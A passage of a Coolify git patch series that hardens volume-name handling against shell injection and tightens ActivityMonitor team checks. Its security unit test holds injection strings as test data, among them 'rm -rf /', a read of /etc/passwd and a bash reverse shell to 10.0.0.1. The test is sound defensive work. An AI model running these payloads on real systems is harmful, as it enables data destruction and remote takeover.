+        return ($cycleIndex + $serverHash) % $interval !== 0;
+    }
 }
diff --git a/tests/Unit/ServerBackoffTest.php b/tests/Unit/ServerBackoffTest.php
new file mode 100644
index 000000000..bdcefb74f
--- /dev/null
+++ b/tests/Unit/ServerBackoffTest.php
@@ -0,0 +1,175 @@
+<?php
+
+use App\Jobs\ServerCheckJob;
+use App\Jobs\ServerConnectionCheckJob;
+use App\Jobs\ServerManagerJob;
+use App\Models\Server;
+use Illuminate\Queue\TimeoutExceededException;
+use Illuminate\Support\Carbon;
+use Tests\TestCase;
+
+uses(TestCase::class);
+
+beforeEach(function () {
+    Carbon::setTestNow('2025-01-15 12:00:00');
+});
+
+afterEach(function () {
+    Mockery::close();
+    Carbon::setTestNow();
+});
+
+describe('getBackoffCycleInterval', function () {
+    it('returns correct intervals for unreachable counts', function () {
+        $job = new ServerManagerJob;
+        $method = new ReflectionMethod($job, 'getBackoffCycleInterval');
+
+        expect($method->invoke($job, 0))->toBe(1)
+            ->and($method->invoke($job, 1))->toBe(1)
+            ->and($method->invoke($job, 2))->toBe(1)
+            ->and($method->invoke($job, 3))->toBe(3)
+            ->and($method->invoke($job, 5))->toBe(3)
+            ->and($method->invoke($job, 6))->toBe(6)
+            ->and($method->invoke($job, 11))->toBe(6)
+            ->and($method->invoke($job, 12))->toBe(12)
+            ->and($method->invoke($job, 100))->toBe(12);
+    });
+});
+
+describe('shouldSkipDueToBackoff', function () {
+    it('never skips servers with unreachable_count <= 2', function () {
+        $job = new ServerManagerJob;
+        $executionTimeProp = new ReflectionProperty($job, 'executionTime');
+        $method = new ReflectionMethod($job, 'shouldSkipDueToBackoff');
+
+        $server = Mockery::mock(Server::class)->makePartial();
+        $server->id = 42;
+
+        foreach ([0, 1, 2] as $count) {
+            $server->unreachable_count = $count;
+
+            // Test across all minutes in an hour
+            for ($minute = 0; $minute < 60; $minute++) {
+                Carbon::setTestNow("2025-01-15 12:{$minute}:00");
+                $executionTimeProp->setValue($job, Carbon::now());
+
+                expect($method->invoke($job, $server))->toBeFalse(
+                    "Should not skip with unreachable_count={$count} at minute={$minute}"
+                );
+            }
+        }
+    });
+
+    it('skips most cycles for servers with high unreachable count', function () {
+        $job = new ServerManagerJob;
+        $executionTimeProp = new ReflectionProperty($job, 'executionTime');
+        $method = new ReflectionMethod($job, 'shouldSkipDueToBackoff');
+
+        $server = Mockery::mock(Server::class)->makePartial();
+        $server->id = 42;
+        $server->unreachable_count = 15; // interval = 12
+
+        $skipCount = 0;
+        $allowCount = 0;
+
+        for ($minute = 0; $minute < 60; $minute++) {
+            Carbon::setTestNow("2025-01-15 12:{$minute}:00");
+            $executionTimeProp->setValue($job, Carbon::now());
+
+            if ($method->invoke($job, $server)) {
+                $skipCount++;
+            } else {
+                $allowCount++;
+            }
+        }
+
+        // With interval=12, most cycles should be skipped but at least one should be allowed
+        expect($allowCount)->toBeGreaterThan(0)
+            ->and($skipCount)->toBeGreaterThan($allowCount);
+    });
+
+    it('distributes checks across servers using server ID hash', function () {
+        $job = new ServerManagerJob;
+        $executionTimeProp = new ReflectionProperty($job, 'executionTime');
+        $method = new ReflectionMethod($job, 'shouldSkipDueToBackoff');
+
+        // Two servers with same unreachable_count but different IDs
+        $server1 = Mockery::mock(Server::class)->makePartial();
+        $server1->id = 1;
+        $server1->unreachable_count = 5; // interval = 3
+
+        $server2 = Mockery::mock(Server::class)->makePartial();
+        $server2->id = 2;
+        $server2->unreachable_count = 5; // interval = 3
+
+        $server1AllowedMinutes = [];
+        $server2AllowedMinutes = [];
+
+        for ($minute = 0; $minute < 60; $minute++) {
+            Carbon::setTestNow("2025-01-15 12:{$minute}:00");
+            $executionTimeProp->setValue($job, Carbon::now());
+
+            if (! $method->invoke($job, $server1)) {
+                $server1AllowedMinutes[] = $minute;
+            }
+            if (! $method->invoke($job, $server2)) {
+                $server2AllowedMinutes[] = $minute;
+            }
+        }
+
+        // Both servers should have some allowed minutes, but not all the same
+        expect($server1AllowedMinutes)->not->toBeEmpty()
+            ->and($server2AllowedMinutes)->not->toBeEmpty()
+            ->and($server1AllowedMinutes)->not->toBe($server2AllowedMinutes);
+    });
+});
+
+describe('ServerConnectionCheckJob unreachable_count', function () {
+    it('increments unreachable_count on timeout', function () {
+        $settings = Mockery::mock();
+        $settings->shouldReceive('update')
+            ->with(['is_reachable' => false, 'is_usable' => false])
+            ->once();
+
+        $server = Mockery::mock(Server::class)->makePartial()->shouldAllowMockingProtectedMethods();
+        $server->shouldReceive('getAttribute')->with('settings')->andReturn($settings);
+        $server->shouldReceive('increment')->with('unreachable_count')->once();
+        $server->id = 1;
+        $server->name = 'test-server';
+
+        $job = new ServerConnectionCheckJob($server);
+        $job->failed(new TimeoutExceededException);
+    });
+
+    it('does not increment unreachable_count for non-timeout failures', function () {
+        $server = Mockery::mock(Server::class)->makePartial()->shouldAllowMockingProtectedMethods();
+        $server->shouldNotReceive('increment');
+        $server->id = 1;
+        $server->name = 'test-server';
+
+        $job = new ServerConnectionCheckJob($server);
+        $job->failed(new RuntimeException('Some other error'));
+    });
+});
+
+describe('ServerCheckJob unreachable_count', function () {
+    it('increments unreachable_count on timeout', function () {
+        $server = Mockery::mock(Server::class)->makePartial()->shouldAllowMockingProtectedMethods();
+        $server->shouldReceive('increment')->with('unreachable_count')->once();
+        $server->id = 1;
+        $server->name = 'test-server';
+
+        $job = new ServerCheckJob($server);
+        $job->failed(new TimeoutExceededException);
+    });
+
+    it('does not increment unreachable_count for non-timeout failures', function () {
+        $server = Mockery::mock(Server::class)->makePartial()->shouldAllowMockingProtectedMethods();
+        $server->shouldNotReceive('increment');
+        $server->id = 1;
+        $server->name = 'test-server';
+
+        $job = new ServerCheckJob($server);
+        $job->failed(new RuntimeException('Some other error'));
+    });
+});

From d2064dd4998694cda2eabd00149f7c4d1e94c699 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 26 Mar 2026 11:06:30 +0100
Subject: [PATCH 147/213] fix(storage): use escapeshellarg for volume names in
 shell commands

Add proper shell escaping for persistent volume names when used in
docker volume rm commands. Also add volume name validation pattern
to ValidationPatterns for consistent input checking.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Actions/Service/DeleteService.php       |  2 +-
 app/Livewire/Project/Service/Storage.php    |  5 +-
 app/Models/Application.php                  |  2 +-
 app/Models/ApplicationPreview.php           |  2 +-
 app/Models/StandaloneClickhouse.php         |  2 +-
 app/Models/StandaloneDragonfly.php          |  2 +-
 app/Models/StandaloneKeydb.php              |  2 +-
 app/Models/StandaloneMariadb.php            |  2 +-
 app/Models/StandaloneMongodb.php            |  2 +-
 app/Models/StandaloneMysql.php              |  2 +-
 app/Models/StandalonePostgresql.php         |  2 +-
 app/Models/StandaloneRedis.php              |  2 +-
 app/Support/ValidationPatterns.php          | 37 ++++++++
 tests/Unit/PersistentVolumeSecurityTest.php | 98 +++++++++++++++++++++
 14 files changed, 149 insertions(+), 13 deletions(-)
 create mode 100644 tests/Unit/PersistentVolumeSecurityTest.php

diff --git a/app/Actions/Service/DeleteService.php b/app/Actions/Service/DeleteService.php
index 8790901cd..460600d69 100644
--- a/app/Actions/Service/DeleteService.php
+++ b/app/Actions/Service/DeleteService.php
@@ -33,7 +33,7 @@ public function handle(Service $service, bool $deleteVolumes, bool $deleteConnec
                     }
                 }
                 foreach ($storagesToDelete as $storage) {
-                    $commands[] = "docker volume rm -f $storage->name";
+                    $commands[] = 'docker volume rm -f '.escapeshellarg($storage->name);
                 }
 
                 // Execute volume deletion first, this must be done first otherwise volumes will not be deleted.
diff --git a/app/Livewire/Project/Service/Storage.php b/app/Livewire/Project/Service/Storage.php
index e896f060a..433c2b13c 100644
--- a/app/Livewire/Project/Service/Storage.php
+++ b/app/Livewire/Project/Service/Storage.php
@@ -5,6 +5,7 @@
 use App\Models\Application;
 use App\Models\LocalFileVolume;
 use App\Models\LocalPersistentVolume;
+use App\Support\ValidationPatterns;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Livewire\Component;
 
@@ -103,10 +104,10 @@ public function submitPersistentVolume()
             $this->authorize('update', $this->resource);
 
             $this->validate([
-                'name' => 'required|string',
+                'name' => ValidationPatterns::volumeNameRules(),
                 'mount_path' => 'required|string',
                 'host_path' => $this->isSwarm ? 'required|string' : 'string|nullable',
-            ]);
+            ], ValidationPatterns::volumeNameMessages());
 
             $name = $this->resource->uuid.'-'.$this->name;
 
diff --git a/app/Models/Application.php b/app/Models/Application.php
index 4cc2dcf74..c446052b3 100644
--- a/app/Models/Application.php
+++ b/app/Models/Application.php
@@ -390,7 +390,7 @@ public function deleteVolumes()
             }
             $server = data_get($this, 'destination.server');
             foreach ($persistentStorages as $storage) {
-                instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+                instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
             }
         }
     }
diff --git a/app/Models/ApplicationPreview.php b/app/Models/ApplicationPreview.php
index 3b7bf3030..b8a8a5a85 100644
--- a/app/Models/ApplicationPreview.php
+++ b/app/Models/ApplicationPreview.php
@@ -37,7 +37,7 @@ protected static function booted()
                 $persistentStorages = $preview->persistentStorages()->get() ?? collect();
                 if ($persistentStorages->count() > 0) {
                     foreach ($persistentStorages as $storage) {
-                        instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+                        instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
                     }
                 }
             }
diff --git a/app/Models/StandaloneClickhouse.php b/app/Models/StandaloneClickhouse.php
index 33f32dd59..143aadb6a 100644
--- a/app/Models/StandaloneClickhouse.php
+++ b/app/Models/StandaloneClickhouse.php
@@ -135,7 +135,7 @@ public function deleteVolumes()
         }
         $server = data_get($this, 'destination.server');
         foreach ($persistentStorages as $storage) {
-            instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+            instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
         }
     }
 
diff --git a/app/Models/StandaloneDragonfly.php b/app/Models/StandaloneDragonfly.php
index 074c5b509..c823c305b 100644
--- a/app/Models/StandaloneDragonfly.php
+++ b/app/Models/StandaloneDragonfly.php
@@ -135,7 +135,7 @@ public function deleteVolumes()
         }
         $server = data_get($this, 'destination.server');
         foreach ($persistentStorages as $storage) {
-            instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+            instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
         }
     }
 
diff --git a/app/Models/StandaloneKeydb.php b/app/Models/StandaloneKeydb.php
index 23b4c65e6..f286e8538 100644
--- a/app/Models/StandaloneKeydb.php
+++ b/app/Models/StandaloneKeydb.php
@@ -135,7 +135,7 @@ public function deleteVolumes()
         }
         $server = data_get($this, 'destination.server');
         foreach ($persistentStorages as $storage) {
-            instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+            instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
         }
     }
 
diff --git a/app/Models/StandaloneMariadb.php b/app/Models/StandaloneMariadb.php
index 4d4b84776..efa62353c 100644
--- a/app/Models/StandaloneMariadb.php
+++ b/app/Models/StandaloneMariadb.php
@@ -136,7 +136,7 @@ public function deleteVolumes()
         }
         $server = data_get($this, 'destination.server');
         foreach ($persistentStorages as $storage) {
-            instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+            instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
         }
     }
 
diff --git a/app/Models/StandaloneMongodb.php b/app/Models/StandaloneMongodb.php
index b5401dd2c..9418ebc21 100644
--- a/app/Models/StandaloneMongodb.php
+++ b/app/Models/StandaloneMongodb.php
@@ -141,7 +141,7 @@ public function deleteVolumes()
         }
         $server = data_get($this, 'destination.server');
         foreach ($persistentStorages as $storage) {
-            instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+            instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
         }
     }
 
diff --git a/app/Models/StandaloneMysql.php b/app/Models/StandaloneMysql.php
index 0b144575c..2b7e9f2b6 100644
--- a/app/Models/StandaloneMysql.php
+++ b/app/Models/StandaloneMysql.php
@@ -136,7 +136,7 @@ public function deleteVolumes()
         }
         $server = data_get($this, 'destination.server');
         foreach ($persistentStorages as $storage) {
-            instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+            instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
         }
     }
 
diff --git a/app/Models/StandalonePostgresql.php b/app/Models/StandalonePostgresql.php
index 92b2efd31..cea600236 100644
--- a/app/Models/StandalonePostgresql.php
+++ b/app/Models/StandalonePostgresql.php
@@ -114,7 +114,7 @@ public function deleteVolumes()
         }
         $server = data_get($this, 'destination.server');
         foreach ($persistentStorages as $storage) {
-            instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+            instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
         }
     }
 
diff --git a/app/Models/StandaloneRedis.php b/app/Models/StandaloneRedis.php
index 352d27cfd..0e904ab31 100644
--- a/app/Models/StandaloneRedis.php
+++ b/app/Models/StandaloneRedis.php
@@ -140,7 +140,7 @@ public function deleteVolumes()
         }
         $server = data_get($this, 'destination.server');
         foreach ($persistentStorages as $storage) {
-            instant_remote_process(["docker volume rm -f $storage->name"], $server, false);
+            instant_remote_process(['docker volume rm -f '.escapeshellarg($storage->name)], $server, false);
         }
     }
 
diff --git a/app/Support/ValidationPatterns.php b/app/Support/ValidationPatterns.php
index 27789b506..7084b4cc2 100644
--- a/app/Support/ValidationPatterns.php
+++ b/app/Support/ValidationPatterns.php
@@ -45,6 +45,13 @@ class ValidationPatterns
      */
     public const SHELL_SAFE_COMMAND_PATTERN = '/^[a-zA-Z0-9 \t._\-\/=:@,+\[\]{}#%^~&"]+$/';
 
+    /**
+     * Pattern for Docker volume names
+     * Must start with alphanumeric, followed by alphanumeric, dots, hyphens, or underscores
+     * Matches Docker's volume naming rules
+     */
+    public const VOLUME_NAME_PATTERN = '/^[a-zA-Z0-9][a-zA-Z0-9._-]*$/';
+
     /**
      * Pattern for Docker container names
      * Must start with alphanumeric, followed by alphanumeric, dots, hyphens, or underscores
@@ -157,6 +164,36 @@ public static function shellSafeCommandRules(int $maxLength = 1000): array
         return ['nullable', 'string', 'max:'.$maxLength, 'regex:'.self::SHELL_SAFE_COMMAND_PATTERN];
     }
 
+    /**
+     * Get validation rules for Docker volume name fields
+     */
+    public static function volumeNameRules(bool $required = true, int $maxLength = 255): array
+    {
+        $rules = [];
+
+        if ($required) {
+            $rules[] = 'required';
+        } else {
+            $rules[] = 'nullable';
+        }
+
+        $rules[] = 'string';
+        $rules[] = "max:$maxLength";
+        $rules[] = 'regex:'.self::VOLUME_NAME_PATTERN;
+
+        return $rules;
+    }
+
+    /**
+     * Get validation messages for volume name fields
+     */
+    public static function volumeNameMessages(string $field = 'name'): array
+    {
+        return [
+            "{$field}.regex" => 'The volume name must start with an alphanumeric character and contain only alphanumeric characters, dots, hyphens, and underscores.',
+        ];
+    }
+
     /**
      * Get validation rules for container name fields
      */
diff --git a/tests/Unit/PersistentVolumeSecurityTest.php b/tests/Unit/PersistentVolumeSecurityTest.php
new file mode 100644
index 000000000..fdce223d3
--- /dev/null
+++ b/tests/Unit/PersistentVolumeSecurityTest.php
@@ -0,0 +1,98 @@
+<?php
+
+/**
+ * Persistent Volume Security Tests
+ *
+ * Tests to ensure persistent volume names are validated against command injection
+ * and that shell commands properly escape volume names.
+ *
+ * Related Advisory: GHSA-mh8x-fppq-cp77
+ * Related Files:
+ *  - app/Models/LocalPersistentVolume.php
+ *  - app/Support/ValidationPatterns.php
+ *  - app/Livewire/Project/Service/Storage.php
+ *  - app/Actions/Service/DeleteService.php
+ */
+
+use App\Support\ValidationPatterns;
+
+// --- Volume Name Pattern Tests ---
+
+it('accepts valid Docker volume names', function (string $name) {
+    expect(preg_match(ValidationPatterns::VOLUME_NAME_PATTERN, $name))->toBe(1);
+})->with([
+    'simple name' => 'myvolume',
+    'with hyphens' => 'my-volume',
+    'with underscores' => 'my_volume',
+    'with dots' => 'my.volume',
+    'with uuid prefix' => 'abc123-postgres-data',
+    'numeric start' => '1volume',
+    'complex name' => 'app123-my_service.data-v2',
+]);
+
+it('rejects volume names with shell metacharacters', function (string $name) {
+    expect(preg_match(ValidationPatterns::VOLUME_NAME_PATTERN, $name))->toBe(0);
+})->with([
+    'semicolon injection' => 'vol; rm -rf /',
+    'pipe injection' => 'vol | cat /etc/passwd',
+    'ampersand injection' => 'vol && whoami',
+    'backtick injection' => 'vol`id`',
+    'dollar command substitution' => 'vol$(whoami)',
+    'redirect injection' => 'vol > /tmp/evil',
+    'space in name' => 'my volume',
+    'slash in name' => 'my/volume',
+    'newline injection' => "vol\nwhoami",
+    'starts with hyphen' => '-volume',
+    'starts with dot' => '.volume',
+]);
+
+// --- escapeshellarg Defense Tests ---
+
+it('escapeshellarg neutralizes injection in docker volume rm command', function (string $maliciousName) {
+    $command = 'docker volume rm -f '.escapeshellarg($maliciousName);
+
+    // The command should contain the name as a single quoted argument,
+    // preventing shell interpretation of metacharacters
+    expect($command)->not->toContain('; ')
+        ->not->toContain('| ')
+        ->not->toContain('&& ')
+        ->not->toContain('`')
+        ->toStartWith('docker volume rm -f ');
+})->with([
+    'semicolon' => 'vol; rm -rf /',
+    'pipe' => 'vol | cat /etc/passwd',
+    'ampersand' => 'vol && whoami',
+    'backtick' => 'vol`id`',
+    'command substitution' => 'vol$(whoami)',
+    'reverse shell' => 'vol$(bash -i >& /dev/tcp/10.0.0.1/8888 0>&1)',
+]);
+
+// --- volumeNameRules Tests ---
+
+it('generates volumeNameRules with correct defaults', function () {
+    $rules = ValidationPatterns::volumeNameRules();
+
+    expect($rules)->toContain('required')
+        ->toContain('string')
+        ->toContain('max:255')
+        ->toContain('regex:'.ValidationPatterns::VOLUME_NAME_PATTERN);
+});
+
+it('generates nullable volumeNameRules when not required', function () {
+    $rules = ValidationPatterns::volumeNameRules(required: false);
+
+    expect($rules)->toContain('nullable')
+        ->not->toContain('required');
+});
+
+it('generates correct volumeNameMessages', function () {
+    $messages = ValidationPatterns::volumeNameMessages();
+
+    expect($messages)->toHaveKey('name.regex');
+});
+
+it('generates volumeNameMessages with custom field name', function () {
+    $messages = ValidationPatterns::volumeNameMessages('volume_name');
+
+    expect($messages)->toHaveKey('volume_name.regex');
+});

From f9a9dc80aa85f494aa4fade9efe46d38afe579f1 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 26 Mar 2026 12:17:39 +0100
Subject: [PATCH 148/213] fix(api): add volume name validation to storage API
 endpoints

Apply the same Docker volume name pattern validation to the API
create and update storage endpoints for applications, databases,
and services controllers.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 app/Http/Controllers/Api/ApplicationsController.php | 5 +++--
 app/Http/Controllers/Api/DatabasesController.php    | 5 +++--
 app/Http/Controllers/Api/ServicesController.php     | 5 +++--
 3 files changed, 9 insertions(+), 6 deletions(-)

diff --git a/app/Http/Controllers/Api/ApplicationsController.php b/app/Http/Controllers/Api/ApplicationsController.php
index b081069b7..ad1f50ea2 100644
--- a/app/Http/Controllers/Api/ApplicationsController.php
+++ b/app/Http/Controllers/Api/ApplicationsController.php
@@ -20,6 +20,7 @@
 use App\Rules\ValidGitBranch;
 use App\Rules\ValidGitRepositoryUrl;
 use App\Services\DockerImageParser;
+use App\Support\ValidationPatterns;
 use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use Illuminate\Support\Facades\Http;
@@ -4096,7 +4097,7 @@ public function update_storage(Request $request): JsonResponse
             'id' => 'integer',
             'type' => 'required|string|in:persistent,file',
             'is_preview_suffix_enabled' => 'boolean',
-            'name' => 'string',
+            'name' => ['string', 'regex:'.ValidationPatterns::VOLUME_NAME_PATTERN],
             'mount_path' => 'string',
             'host_path' => 'string|nullable',
             'content' => 'string|nullable',
@@ -4274,7 +4275,7 @@ public function create_storage(Request $request): JsonResponse
 
         $validator = customApiValidator($request->all(), [
             'type' => 'required|string|in:persistent,file',
-            'name' => 'string',
+            'name' => ['string', 'regex:'.ValidationPatterns::VOLUME_NAME_PATTERN],
             'mount_path' => 'required|string',
             'host_path' => 'string|nullable',
             'content' => 'string|nullable',
diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index f9e171eee..660ed4529 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -19,6 +19,7 @@
 use App\Models\ScheduledDatabaseBackup;
 use App\Models\Server;
 use App\Models\StandalonePostgresql;
+use App\Support\ValidationPatterns;
 use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use Illuminate\Support\Facades\DB;
@@ -3467,7 +3468,7 @@ public function create_storage(Request $request): JsonResponse
 
         $validator = customApiValidator($request->all(), [
             'type' => 'required|string|in:persistent,file',
-            'name' => 'string',
+            'name' => ['string', 'regex:'.ValidationPatterns::VOLUME_NAME_PATTERN],
             'mount_path' => 'required|string',
             'host_path' => 'string|nullable',
             'content' => 'string|nullable',
@@ -3665,7 +3666,7 @@ public function update_storage(Request $request): JsonResponse
             'id' => 'integer',
             'type' => 'required|string|in:persistent,file',
             'is_preview_suffix_enabled' => 'boolean',
-            'name' => 'string',
+            'name' => ['string', 'regex:'.ValidationPatterns::VOLUME_NAME_PATTERN],
             'mount_path' => 'string',
             'host_path' => 'string|nullable',
             'content' => 'string|nullable',
diff --git a/app/Http/Controllers/Api/ServicesController.php b/app/Http/Controllers/Api/ServicesController.php
index 89635875c..fbf4b9e56 100644
--- a/app/Http/Controllers/Api/ServicesController.php
+++ b/app/Http/Controllers/Api/ServicesController.php
@@ -13,6 +13,7 @@
 use App\Models\Project;
 use App\Models\Server;
 use App\Models\Service;
+use App\Support\ValidationPatterns;
 use Illuminate\Http\JsonResponse;
 use Illuminate\Http\Request;
 use Illuminate\Support\Facades\Validator;
@@ -2015,7 +2016,7 @@ public function create_storage(Request $request): JsonResponse
         $validator = customApiValidator($request->all(), [
             'type' => 'required|string|in:persistent,file',
             'resource_uuid' => 'required|string',
-            'name' => 'string',
+            'name' => ['string', 'regex:'.ValidationPatterns::VOLUME_NAME_PATTERN],
             'mount_path' => 'required|string',
             'host_path' => 'string|nullable',
             'content' => 'string|nullable',
@@ -2224,7 +2225,7 @@ public function update_storage(Request $request): JsonResponse
             'id' => 'integer',
             'type' => 'required|string|in:persistent,file',
             'is_preview_suffix_enabled' => 'boolean',
-            'name' => 'string',
+            'name' => ['string', 'regex:'.ValidationPatterns::VOLUME_NAME_PATTERN],
             'mount_path' => 'string',
             'host_path' => 'string|nullable',
             'content' => 'string|nullable',

From 3e0d48faeaab950bfd063dfca908f1d140316ede Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Thu, 26 Mar 2026 13:26:16 +0100
Subject: [PATCH 149/213] refactor: simplify remote process chain and harden
 ActivityMonitor

- Inline PrepareCoolifyTask and CoolifyTaskArgs into remote_process(),
  removing two single-consumer abstraction layers
- Add #[Locked] attribute to ActivityMonitor $activityId property
- Add team ownership verification in ActivityMonitor.hydrateActivity()
  with server_uuid fallback and fail-closed default
- Store team_id in activity properties for proper scoping
- Update CLAUDE.md to remove stale reference
- Add comprehensive tests for activity monitor authorization

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
---
 CLAUDE.md                                     |  2 +-
 .../CoolifyTask/PrepareCoolifyTask.php        | 54 -------------
 app/Data/CoolifyTaskArgs.php                  | 30 -------
 app/Livewire/ActivityMonitor.php              | 51 +++++++++---
 bootstrap/helpers/remoteProcess.php           | 64 +++++++++------
 .../views/livewire/activity-monitor.blade.php |  4 +-
 .../Feature/ActivityMonitorCrossTeamTest.php  | 81 +++++++++++++++++--
 7 files changed, 155 insertions(+), 131 deletions(-)
 delete mode 100644 app/Actions/CoolifyTask/PrepareCoolifyTask.php
 delete mode 100644 app/Data/CoolifyTaskArgs.php

diff --git a/CLAUDE.md b/CLAUDE.md
index 99e996756..bb65da405 100644
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -43,7 +43,7 @@ ### Backend Structure (app/)
 - **Models/** — Eloquent models extending `BaseModel` which provides auto-CUID2 UUID generation. Key models: `Server`, `Application`, `Service`, `Project`, `Environment`, `Team`, plus standalone database models (`StandalonePostgresql`, `StandaloneMysql`, etc.). Common traits: `HasConfiguration`, `HasMetrics`, `HasSafeStringAttribute`, `ClearsGlobalSearchCache`.
 - **Services/** — Business logic services (ConfigurationGenerator, DockerImageParser, ContainerStatusAggregator, HetznerService, etc.). Use Services for complex orchestration; use Actions for single-purpose domain operations.
 - **Helpers/** — Global helpers loaded via `bootstrap/includeHelpers.php` from `bootstrap/helpers/` — organized into `shared.php`, `constants.php`, `versions.php`, `subscriptions.php`, `domains.php`, `docker.php`, `services.php`, `github.php`, `proxy.php`, `notifications.php`.
-- **Data/** — Spatie Laravel Data DTOs (e.g., `CoolifyTaskArgs`, `ServerMetadata`).
+- **Data/** — Spatie Laravel Data DTOs (e.g., `ServerMetadata`).
 - **Enums/** — PHP enums (TitleCase keys). Key enums: `ProcessStatus`, `Role` (MEMBER/ADMIN/OWNER with rank comparison), `BuildPackTypes`, `ProxyTypes`, `ContainerStatusTypes`.
 - **Rules/** — Custom validation rules (`ValidGitRepositoryUrl`, `ValidServerIp`, `ValidHostname`, `DockerImageFormat`, etc.).
 
diff --git a/app/Actions/CoolifyTask/PrepareCoolifyTask.php b/app/Actions/CoolifyTask/PrepareCoolifyTask.php
deleted file mode 100644
index 3f76a2e3c..000000000
--- a/app/Actions/CoolifyTask/PrepareCoolifyTask.php
+++ /dev/null
@@ -1,54 +0,0 @@
-<?php
-
-namespace App\Actions\CoolifyTask;
-
-use App\Data\CoolifyTaskArgs;
-use App\Jobs\CoolifyTask;
-use Spatie\Activitylog\Models\Activity;
-
-/**
- * The initial step to run a `CoolifyTask`: a remote SSH process
- * with monitoring/tracking/trace feature. Such thing is made
- * possible using an Activity model and some attributes.
- */
-class PrepareCoolifyTask
-{
-    protected Activity $activity;
-
-    protected CoolifyTaskArgs $remoteProcessArgs;
-
-    public function __construct(CoolifyTaskArgs $remoteProcessArgs)
-    {
-        $this->remoteProcessArgs = $remoteProcessArgs;
-
-        if ($remoteProcessArgs->model) {
-            $properties = $remoteProcessArgs->toArray();
-            unset($properties['model']);
-
-            $this->activity = activity()
-                ->withProperties($properties)
-                ->performedOn($remoteProcessArgs->model)
-                ->event($remoteProcessArgs->type)
-                ->log('[]');
-        } else {
-            $this->activity = activity()
-                ->withProperties($remoteProcessArgs->toArray())
-                ->event($remoteProcessArgs->type)
-                ->log('[]');
-        }
-    }
-
-    public function __invoke(): Activity
-    {
-        $job = new CoolifyTask(
-            activity: $this->activity,
-            ignore_errors: $this->remoteProcessArgs->ignore_errors,
-            call_event_on_finish: $this->remoteProcessArgs->call_event_on_finish,
-            call_event_data: $this->remoteProcessArgs->call_event_data,
-        );
-        dispatch($job);
-        $this->activity->refresh();
-
-        return $this->activity;
-    }
-}
diff --git a/app/Data/CoolifyTaskArgs.php b/app/Data/CoolifyTaskArgs.php
deleted file mode 100644
index 24132157a..000000000
--- a/app/Data/CoolifyTaskArgs.php
+++ /dev/null
@@ -1,30 +0,0 @@
-<?php
-
-namespace App\Data;
-
-use App\Enums\ProcessStatus;
-use Illuminate\Database\Eloquent\Model;
-use Spatie\LaravelData\Data;
-
-/**
- * The parameters to execute a CoolifyTask, organized in a DTO.
- */
-class CoolifyTaskArgs extends Data
-{
-    public function __construct(
-        public string $server_uuid,
-        public string $command,
-        public string $type,
-        public ?string $type_uuid = null,
-        public ?int $process_id = null,
-        public ?Model $model = null,
-        public ?string $status = null,
-        public bool $ignore_errors = false,
-        public $call_event_on_finish = null,
-        public $call_event_data = null
-    ) {
-        if (is_null($status)) {
-            $this->status = ProcessStatus::QUEUED->value;
-        }
-    }
-}
diff --git a/app/Livewire/ActivityMonitor.php b/app/Livewire/ActivityMonitor.php
index 85ba60c33..665d14ba0 100644
--- a/app/Livewire/ActivityMonitor.php
+++ b/app/Livewire/ActivityMonitor.php
@@ -2,7 +2,9 @@
 
 namespace App\Livewire;
 
+use App\Models\Server;
 use App\Models\User;
+use Livewire\Attributes\Locked;
 use Livewire\Component;
 use Spatie\Activitylog\Models\Activity;
 
@@ -10,6 +12,7 @@ class ActivityMonitor extends Component
 {
     public ?string $header = null;
 
+    #[Locked]
     public $activityId = null;
 
     public $eventToDispatch = 'activityFinished';
@@ -57,25 +60,47 @@ public function hydrateActivity()
 
         $activity = Activity::find($this->activityId);
 
-        if ($activity) {
-            $teamId = data_get($activity, 'properties.team_id');
-            if ($teamId && $teamId !== currentTeam()?->id) {
+        if (! $activity) {
+            $this->activity = null;
+
+            return;
+        }
+
+        $currentTeamId = currentTeam()?->id;
+
+        // Check team_id stored directly in activity properties
+        $activityTeamId = data_get($activity, 'properties.team_id');
+        if ($activityTeamId !== null) {
+            if ((int) $activityTeamId !== (int) $currentTeamId) {
                 $this->activity = null;
 
                 return;
             }
+
+            $this->activity = $activity;
+
+            return;
+        }
+
+        // Fallback: verify ownership via the server that ran the command
+        $serverUuid = data_get($activity, 'properties.server_uuid');
+        if ($serverUuid) {
+            $server = Server::where('uuid', $serverUuid)->first();
+            if ($server && (int) $server->team_id !== (int) $currentTeamId) {
+                $this->activity = null;
+
+                return;
+            }
+
+            if ($server) {
+                $this->activity = $activity;
+
+                return;
+            }
         }
 
-        $this->activity = $activity;
-    }
-
